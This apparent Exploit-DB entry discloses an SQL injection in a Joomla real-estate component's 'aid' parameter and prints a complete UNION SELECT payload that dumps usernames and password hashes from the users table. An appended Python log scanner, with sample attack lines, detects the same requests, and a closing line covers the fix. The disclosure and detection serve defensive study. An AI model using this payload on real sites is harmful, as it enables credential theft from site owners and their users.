Joomla! Component Real Estate Property 3.1.22-03 – ‘aid’ SQL Injection

  • Author: c4uR
    Date: 2010-04-10
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12136/
  • +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    
    Author: c4uR [caurcdma@yahoo.com]
    Date: April, 10-2010 [INDONESIA]
    Exploit Title: Joomla Component com_properties[aid] SQL Injection Vulnerability
    
    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    
    ###################################################################################
    
    +++ Vulnerable File +++
     http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=[gubr4k]
    
    +++ ExploiT +++
     -91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
    
    +++ Example +++
     http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
    
    
    
    ###################################################################################
    
    ----------------------------------------------------------------------------------
    
    DEVILZC0DE.ORG + INDONESIANHACKER.ORG + HACKER-NEWBIE.ORG + YOGYACARDERLINK.WEB.ID
    hashkiller.com + insidepro.com + xaknet.ru + turkishajan.com
    
    ----------------------------------------------------------------------------------
    
    [ thnx to ]
    
    [+] Apartement Griya Semanggi + poisonV
    [+] Indonesia never dies, even though it is sometimes gloomy
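
Detection sketch for the request shape shown above, added here as an example and not part of the original advisory or the component's code: it scans web access logs for com_properties requests whose aid value is not a plain integer. The log lines are constructed samples, and the rule that a legitimate aid is an unsigned integer id is an assumption, as is the function name.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2010:10:00:01 +0000] "GET /index.php?option=com_properties&task=agentlisting&aid=12 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Apr/2010:10:00:07 +0000] "GET /index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version()-- HTTP/1.1" 200 7344
203.0.113.9 - - [10/Apr/2010:10:00:09 +0000] "GET /index.php?option=com_properties&task=agentlisting&aid=%2d1%20union%20select%201 HTTP/1.1" 200 7001
198.51.100.2 - - [10/Apr/2010:10:01:00 +0000] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 900
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate aid is an unsigned integer agent id.
INTEGER_RE = re.compile(r"\d+")


def suspicious_aid_requests(log_text):
    """Return (client_ip, decoded_aid) for com_properties requests whose aid is not an integer."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        # parse_qs URL-decodes values, so %20 and + both become spaces.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "com_properties" not in params.get("option", []):
            continue
        for aid in params.get("aid", []):
            if not INTEGER_RE.fullmatch(aid.strip()):
                hits.append((client, aid))
    return hits


if __name__ == "__main__":
    for client, aid in suspicious_aid_requests(SAMPLE_LOG):
        print(f"{client}\taid={aid!r}")
```

The same integer-only rule is the mitigation on the server side: casting aid to an integer, or binding it as a query parameter, before it reaches the SQL statement removes the injection point.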